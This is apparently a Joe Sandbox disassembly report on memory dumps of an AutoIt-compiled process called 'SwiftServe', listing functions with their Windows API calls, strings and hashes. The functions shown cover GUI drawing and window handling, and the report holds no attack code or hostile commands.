Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: MessageSend$Window
String ID: 0
API String ID: 2326795674-4108050209
Opcode ID: 37ce3aae9bb99338560c4991d84cb50c8f29d7a4ea213ec20d3a9cbbbe3786ab
Instruction ID: a24a1e7c2fea67fd0b353656870a05f77b52f3148f242737fe160011d5689795
Opcode Fuzzy Hash: 37ce3aae9bb99338560c4991d84cb50c8f29d7a4ea213ec20d3a9cbbbe3786ab
Instruction Fuzzy Hash: E502D030108341AFD725CF14C848BABBBE5FF8E318F08962DF595AA2A1C775E954CB52

Function 00EAAF18 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 00EAAF51
SetTextColor.GDI32(?,?), ref: 00EAAF55
GetSysColorBrush.USER32(0000000F), ref: 00EAAF6B
GetSysColor.USER32(0000000F), ref: 00EAAF76
CreateSolidBrush.GDI32(?), ref: 00EAAF7B
GetSysColor.USER32(00000011), ref: 00EAAF93
CreatePen.GDI32(00000000,00000001,00743C00), ref: 00EAAFA1
SelectObject.GDI32(?,00000000), ref: 00EAAFB2
SetBkColor.GDI32(?,00000000), ref: 00EAAFBB
SelectObject.GDI32(?,?), ref: 00EAAFC8
InflateRect.USER32(?,000000FF,000000FF), ref: 00EAAFE7
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00EAAFFE
GetWindowLongW.USER32(00000000,000000F0), ref: 00EAB013
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00EAB05F
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00EAB086
InflateRect.USER32(?,000000FD,000000FD), ref: 00EAB0A4
DrawFocusRect.USER32(?,?), ref: 00EAB0AF
GetSysColor.USER32(00000011), ref: 00EAB0BD
SetTextColor.GDI32(?,00000000), ref: 00EAB0C5
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00EAB0D9
SelectObject.GDI32(?,00EAAC1F), ref: 00EAB0F0
DeleteObject.GDI32(?), ref: 00EAB0FB
SelectObject.GDI32(?,?), ref: 00EAB101
DeleteObject.GDI32(?), ref: 00EAB106
SetTextColor.GDI32(?,?), ref: 00EAB10C
SetBkColor.GDI32(?,?), ref: 00EAB116

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 323a2cb66246fde86d31a25a672605da06c3cfe65000efc99574cf945c0f8787
Instruction ID: 665fe3ae07117f166334e8466f417d345c81d3825b656c9249b5ecaaeda34cdd
Opcode Fuzzy Hash: 323a2cb66246fde86d31a25a672605da06c3cfe65000efc99574cf945c0f8787
Instruction Fuzzy Hash: 3F617C71901218AFDF159FA9DC48AAF7B79EF08320F104225F915BB2A1D771A944CF90

Function 00EA8FFA Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00EA90EA
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00EA90FB
CharNextW.USER32(0000014E), ref: 00EA912A
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00EA916B
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00EA9181
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00EA9192
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00EA91AF
SetWindowTextW.USER32(?,0000014E), ref: 00EA91FB
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00EA9211
SendMessageW.USER32(?,00001002,00000000,?), ref: 00EA9242
_memset.LIBCMT ref: 00EA9267
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00EA92B0
_memset.LIBCMT ref: 00EA930F
SendMessageW.USER32(?,00001053,000000FF,?), ref: 00EA9339
SendMessageW.USER32(?,00001074,?,00000001), ref: 00EA9391
SendMessageW.USER32(?,0000133D,?,?), ref: 00EA943E
InvalidateRect.USER32(?,00000000,00000001), ref: 00EA9460
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00EA94AA
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00EA94D7
DrawMenuBar.USER32(?), ref: 00EA94E6
SetWindowTextW.USER32(?,0000014E), ref: 00EA950E

Strings

0, xrefs: 00EA9478

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: 67155ffe35c8013b2665697c31691c43766079a0af4c9ac56d36b6dfe1b98911
Instruction ID: 789b77d07b1812c3a7aae0d166687606281f51fc176116baa61b0ade7831b238
Opcode Fuzzy Hash: 67155ffe35c8013b2665697c31691c43766079a0af4c9ac56d36b6dfe1b98911
Instruction Fuzzy Hash: 6FE18D70900218AEDF219F91CC84EEF7BB8EF0A754F109156F915BE292D770AA85CF60

Function 00EA4ECC Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00EA5007
GetDesktopWindow.USER32 ref: 00EA501C
GetWindowRect.USER32(00000000), ref: 00EA5023
GetWindowLongW.USER32(?,000000F0), ref: 00EA5085
DestroyWindow.USER32(?), ref: 00EA50B1
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00EA50DA
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00EA50F8
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00EA511E
SendMessageW.USER32(?,00000421,?,?), ref: 00EA5133
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00EA5146
IsWindowVisible.USER32(?), ref: 00EA5166
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00EA5181
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00EA5195
GetWindowRect.USER32(?,?), ref: 00EA51AD
MonitorFromPoint.USER32(?,?,00000002), ref: 00EA51D3
GetMonitorInfoW.USER32(00000000,?), ref: 00EA51ED
CopyRect.USER32(?,?), ref: 00EA5204
SendMessageW.USER32(?,00000412,00000000), ref: 00EA526F

Strings

0, xrefs: 00EA4FB2
tooltips_class32, xrefs: 00EA50D3
(, xrefs: 00EA51E0

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 549396fb3da091732a3af512804a38936908b660759314f50ecbd3fcaede7202
Instruction ID: 9cb64c2fe41ba04c114a648fd6a472c0ee408e4843820f9d15a45e444c170069
Opcode Fuzzy Hash: 549396fb3da091732a3af512804a38936908b660759314f50ecbd3fcaede7202
Instruction Fuzzy Hash: 65B19A72604700AFD704DF64D984B6BBBE4FF89314F009A1CF599AB2A1DB70E805CB92

Function 00E8498A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 00E8499C
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00E849C2
_wcscpy.LIBCMT ref: 00E849F0
_wcscmp.LIBCMT ref: 00E849FB
_wcscat.LIBCMT ref: 00E84A11
_wcsstr.LIBCMT ref: 00E84A1C
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00E84A38
_wcscat.LIBCMT ref: 00E84A81
_wcscat.LIBCMT ref: 00E84A88
_wcsncpy.LIBCMT ref: 00E84AB3

Strings

\VarFileInfo\Translation, xrefs: 00E84A30
04090000, xrefs: 00E84A6E
%u.%u.%u.%u, xrefs: 00E84B16
DefaultLangCodepage, xrefs: 00E84A9B
StringFileInfo\, xrefs: 00E84A0B

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 699586101-1459072770
Opcode ID: ea7183ac414f76018637bf9539b8a1376f848a7d63fd17dca325df3e62045368
Instruction ID: f655e069abf31a065aec12eca729375b4c1bc1c0169c5306e631f575c1048534
Opcode Fuzzy Hash: ea7183ac414f76018637bf9539b8a1376f848a7d63fd17dca325df3e62045368
Instruction Fuzzy Hash: C641F6B2A00315BADB15B6709C46EBFBBECDF45710F00215AFA08B61D2FB359A0197A5

Function 00E22BA9 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 286windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00E22C8C
GetSystemMetrics.USER32(00000007), ref: 00E22C94
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00E22CBF
GetSystemMetrics.USER32(00000008), ref: 00E22CC7
GetSystemMetrics.USER32(00000004), ref: 00E22CEC
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00E22D09
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00E22D19
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00E22D4C
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00E22D60
GetClientRect.USER32(00000000,000000FF), ref: 00E22D7E
GetStockObject.GDI32(00000011), ref: 00E22D9A
SendMessageW.USER32(00000000,00000030,00000000), ref: 00E22DA5

Part of subcall function 00E22714: GetCursorPos.USER32(?), ref: 00E22727
Part of subcall function 00E22714: ScreenToClient.USER32(00EE77B0,?), ref: 00E22744
Part of subcall function 00E22714: GetAsyncKeyState.USER32(00000001), ref: 00E22769
Part of subcall function 00E22714: GetAsyncKeyState.USER32(00000002), ref: 00E22777

SetTimer.USER32(00000000,00000000,00000028,00E213C7), ref: 00E22DCC

Strings

AutoIt v3 GUI, xrefs: 00E22D44
h, xrefs: 00E22BEC, 00E5C433

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI$h
API String ID: 1458621304-1309884394
Opcode ID: 441bcbacefa43f2dd569d7df61c1e0aa6de3af9845af1c3d25bf5bd34ccf8945
Instruction ID: 403d183fc537276c134fe448e9a5dfd6a6a105f48bc853028216907c26a4ad56
Opcode Fuzzy Hash: 441bcbacefa43f2dd569d7df61c1e0aa6de3af9845af1c3d25bf5bd34ccf8945
Instruction Fuzzy Hash: 98B18C71A0021AAFDB14DFA9EC95BEE7BB4FB08315F105229FA15B7290DB70A844CF54

Function 00E40429 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 349COMMON

Download Yara Rule

APIs

Part of subcall function 00E31821: _memmove.LIBCMT ref: 00E3185B

GetForegroundWindow.USER32(00EB0980,?,?,?,?,?), ref: 00E404E3
IsWindow.USER32(?), ref: 00E766BB

Strings

INSTANCE, xrefs: 00E765FA
HANDLE, xrefs: 00E7649E
REGEXPCLASS, xrefs: 00E76506
ALL, xrefs: 00E76622
TITLE, xrefs: 00E76650
LAST, xrefs: 00E76472
REGEXPTITLE, xrefs: 00E764B4
CLASS, xrefs: 00E764E5
ACTIVE, xrefs: 00E76488

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Window$Foreground_memmove
String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
API String ID: 3828923867-1919597938
Opcode ID: da70d5636cfba93c701dd3f1f1bf937865b95d166c6a3fe382e293e4f6ee1365
Instruction ID: d13ad9c63f05c9c1915c2b7f49961616a7d7df8cd219c34af9fe68ec366a5648
Opcode Fuzzy Hash: da70d5636cfba93c701dd3f1f1bf937865b95d166c6a3fe382e293e4f6ee1365
Instruction Fuzzy Hash: 96D1A030104602DFCB08EF60D44199ABBF5BF90348F54AA2DF559776A1DB30FA59CB92

Function 00EA441F Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00EA44AC
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00EA456C

Strings

GETITEMCOUNT, xrefs: 00EA44DE
SELECT, xrefs: 00EA4606
GETSUBITEMCOUNT, xrefs: 00EA44F7
GETTEXT, xrefs: 00EA4515
VIEWCHANGE, xrefs: 00EA472B
GETSELECTED, xrefs: 00EA469A
SELECTALL, xrefs: 00EA45D3
SELECTCLEAR, xrefs: 00EA45EB
ISSELECTED, xrefs: 00EA4577
SELECTINVERT, xrefs: 00EA463C
FINDITEM, xrefs: 00EA46DF
DESELECT, xrefs: 00EA465A
GETSELECTEDCOUNT, xrefs: 00EA454F

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 3974292440-719923060
Opcode ID: b5647e295d176aba178d8c2e4b2ebe1b7e23eb5465f54ea5508134a53fa1af21
Instruction ID: e1e197bd7bd5320ca85e135050db63fc47c7b02b6b8f6c2fe4bb566d5d5e6f8d
Opcode Fuzzy Hash: b5647e295d176aba178d8c2e4b2ebe1b7e23eb5465f54ea5508134a53fa1af21
Instruction Fuzzy Hash: F0A16CB02142119BCB14EF20D951E6AB7E5AFCA314F10A969F856BB3D2DB70FC05CB51

Function 00E956C8 Relevance: 27.1, APIs: 18, Instructions: 124COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F89), ref: 00E956E1
LoadCursorW.USER32(00000000,00007F8A), ref: 00E956EC
LoadCursorW.USER32(00000000,00007F00), ref: 00E956F7
LoadCursorW.USER32(00000000,00007F03), ref: 00E95702
LoadCursorW.USER32(00000000,00007F8B), ref: 00E9570D
LoadCursorW.USER32(00000000,00007F01), ref: 00E95718
LoadCursorW.USER32(00000000,00007F81), ref: 00E95723
LoadCursorW.USER32(00000000,00007F88), ref: 00E9572E
LoadCursorW.USER32(00000000,00007F80), ref: 00E95739
LoadCursorW.USER32(00000000,00007F86), ref: 00E95744
LoadCursorW.USER32(00000000,00007F83), ref: 00E9574F
LoadCursorW.USER32(00000000,00007F85), ref: 00E9575A
LoadCursorW.USER32(00000000,00007F82), ref: 00E95765
LoadCursorW.USER32(00000000,00007F84), ref: 00E95770
LoadCursorW.USER32(00000000,00007F04), ref: 00E9577B
LoadCursorW.USER32(00000000,00007F02), ref: 00E95786
GetCursorInfo.USER32(?), ref: 00E95796
GetLastError.KERNEL32(00000001,00000000), ref: 00E957C1

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Cursor$Load$ErrorInfoLast
String ID:
API String ID: 3215588206-0
Opcode ID: 471d88f36933971eb68cd8cce764e030d6a6799e1ccd953a38e73de6387fe60b
Instruction ID: 5ae8fd1a2a0ecc12bead3d7f4e22763bb29a91c1eb70a6b0cf0673eef900c244
Opcode Fuzzy Hash: 471d88f36933971eb68cd8cce764e030d6a6799e1ccd953a38e73de6387fe60b
Instruction Fuzzy Hash: B8414171E04319AADF109FBA8C49D6FFEF8EF51B50B10452BE519E7290DAB8A500CF51

Function 00E7B13A Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00E7B17B
__swprintf.LIBCMT ref: 00E7B21C
_wcscmp.LIBCMT ref: 00E7B22F
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00E7B284
_wcscmp.LIBCMT ref: 00E7B2C0
GetClassNameW.USER32(?,?,00000400), ref: 00E7B2F7
GetDlgCtrlID.USER32(?), ref: 00E7B349
GetWindowRect.USER32(?,?), ref: 00E7B37F
GetParent.USER32(?), ref: 00E7B39D
ScreenToClient.USER32(00000000), ref: 00E7B3A4
GetClassNameW.USER32(?,?,00000100), ref: 00E7B41E
_wcscmp.LIBCMT ref: 00E7B432
GetWindowTextW.USER32(?,?,00000400), ref: 00E7B458
_wcscmp.LIBCMT ref: 00E7B46C

Part of subcall function 00E4385C: _iswctype.LIBCMT ref: 00E43864

Strings

%s%u, xrefs: 00E7B216

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
String ID: %s%u
API String ID: 3744389584-679674701
Opcode ID: c863d821fceb45ace9f68f98b7f6beafd778869a2723f2b08d9fba7eb4d46fe1
Instruction ID: 510dcdcbda907d3a253f44c51f1d02ba098da114917ad88de9bcb5f1dc7fcd8a
Opcode Fuzzy Hash: c863d821fceb45ace9f68f98b7f6beafd778869a2723f2b08d9fba7eb4d46fe1
Instruction Fuzzy Hash: 73A1D271204306AFD715DF24C884BABB7E8FF44358F109629F9ADE2191EB30E955CB91

Function 00E7BA6D Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 00E7BAB1
_wcscmp.LIBCMT ref: 00E7BAC2
GetWindowTextW.USER32(00000001,?,00000400), ref: 00E7BAEA
CharUpperBuffW.USER32(?,00000000), ref: 00E7BB07
_wcscmp.LIBCMT ref: 00E7BB25
_wcsstr.LIBCMT ref: 00E7BB36
GetClassNameW.USER32(00000018,?,00000400), ref: 00E7BB6E
_wcscmp.LIBCMT ref: 00E7BB7E
GetWindowTextW.USER32(00000002,?,00000400), ref: 00E7BBA5
GetClassNameW.USER32(00000018,?,00000400), ref: 00E7BBEE
_wcscmp.LIBCMT ref: 00E7BBFE
GetClassNameW.USER32(00000010,?,00000400), ref: 00E7BC26
GetWindowRect.USER32(00000004,?), ref: 00E7BC8F

Strings

@, xrefs: 00E7BA92
ThumbnailClass, xrefs: 00E7BB79, 00E7BBF9

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: 57fe166627506590fb60525130b7e0abad204a0ec5d735b6d6a4cfec90a898ca
Instruction ID: a89ed4881c019724f866fbce7ee13710214d43768fb4e4f35d5090f7944c21fa
Opcode Fuzzy Hash: 57fe166627506590fb60525130b7e0abad204a0ec5d735b6d6a4cfec90a898ca
Instruction Fuzzy Hash: BE81A1710042099FDB15DF14C885FABBBD8EF44318F14E56AFD89AA096DB30ED49CB61

Function 00E7B8B6 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00E7B915

Strings

[HANDLE:, xrefs: 00E7B921
[LAST, xrefs: 00E7B9C2
CLASSNAME=, xrefs: 00E7B952
REGEXP=, xrefs: 00E7B92A
[ACTIVE, xrefs: 00E7B902
[REGEXPTITLE:, xrefs: 00E7B93D
[CLASS:, xrefs: 00E7B965
ALL, xrefs: 00E7B9A9
HANDLE=, xrefs: 00E7B90E
LAST, xrefs: 00E7B8DA
ACTIVE, xrefs: 00E7B8F0
[ALL, xrefs: 00E7B9BB

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: f645a141a17fd111dcf8fdf094c4fdd27476f305b6d83545812206448df47e46
Instruction ID: b6f7324b62b58a329bfaf11084e06269d92373a8efad8772fbe2f77692b31470
Opcode Fuzzy Hash: f645a141a17fd111dcf8fdf094c4fdd27476f305b6d83545812206448df47e46
Instruction Fuzzy Hash: 9B31DC30A40205A6CA18EA60DD07FEE77E4EF20350F24712AF665B11D2EB52AF01C652

Function 00E7CB97 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 00E7CBAA
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00E7CBBC
SetWindowTextW.USER32(?,?), ref: 00E7CBD3
GetDlgItem.USER32(?,000003EA), ref: 00E7CBE8
SetWindowTextW.USER32(00000000,?), ref: 00E7CBEE
GetDlgItem.USER32(?,000003E9), ref: 00E7CBFE
SetWindowTextW.USER32(00000000,?), ref: 00E7CC04
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00E7CC25
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00E7CC3F
GetWindowRect.USER32(?,?), ref: 00E7CC48
SetWindowTextW.USER32(?,?), ref: 00E7CCB3
